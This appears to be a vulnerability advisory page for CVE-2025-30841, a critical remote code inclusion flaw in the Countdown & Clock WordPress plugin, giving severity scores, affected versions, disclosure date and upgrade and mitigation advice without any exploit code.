Platform
wordpress
Component
countdown-builder
Fixed in
2.8.9
CVE-2025-30841 describes a Remote Code Execution (RCE) vulnerability within the Countdown & Clock WordPress plugin. This flaw, stemming from improper path limitation, allows attackers to execute arbitrary code on vulnerable systems through Remote Code Inclusion. The vulnerability impacts versions from 0.0.0 up to and including 2.8.8. A patch is available in version 2.8.9.
The impact of CVE-2025-30841 is severe. An attacker exploiting this vulnerability can achieve Remote Code Inclusion (RCI), effectively gaining control over the web server hosting the vulnerable WordPress site. This could involve uploading and executing malicious PHP scripts, leading to complete system compromise. Data at risk includes sensitive user information stored in the WordPress database, website files, and potentially access to other systems on the same network if the server is not properly segmented. The blast radius extends to any user accessing the compromised website, as attackers could inject malicious content or redirect users to phishing sites.
CVE-2025-30841 was publicly disclosed on 2025-04-01. The vulnerability's severity is rated as CRITICAL (CVSS 9.9). Public proof-of-concept (PoC) code is likely to emerge given the ease of exploitation associated with path traversal vulnerabilities. The potential for widespread exploitation is high, particularly given the popularity of the Countdown & Clock plugin. It is not currently listed on CISA KEV.
Exploit Status
EPSS
0.40% (61% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-30841 is to immediately upgrade the Countdown & Clock plugin to version 2.8.9 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider temporarily restricting access to the plugin's file upload functionality. Web Application Firewall (WAF) rules can be implemented to filter out suspicious file upload requests containing path traversal sequences (e.g., ../). Monitor WordPress access logs for unusual file access patterns or attempts to access files outside the plugin's designated directory. After upgrading, confirm the vulnerability is resolved by attempting to access a non-existent file via the plugin's file upload mechanism; the request should be denied.
Update the Countdown & Clock plugin to the latest available version to mitigate the path traversal vulnerability. Check for updates in the WordPress repository or on the developer's website. Ensure you perform a full backup of your website before applying any updates.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-30841 is a critical Remote Code Execution vulnerability in the Countdown & Clock WordPress plugin, allowing attackers to execute arbitrary code via path traversal.
You are affected if you are using Countdown & Clock versions 0.0.0 through 2.8.8. Check your plugin version and update immediately.
Upgrade the Countdown & Clock plugin to version 2.8.9 or later to patch the vulnerability. If immediate upgrade is not possible, implement temporary restrictions on file uploads.
While no active exploitation has been confirmed, the ease of exploitation suggests a high probability of exploitation in the near future.
Refer to the official Countdown & Clock plugin website or WordPress plugin repository for the latest security advisory and update information.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.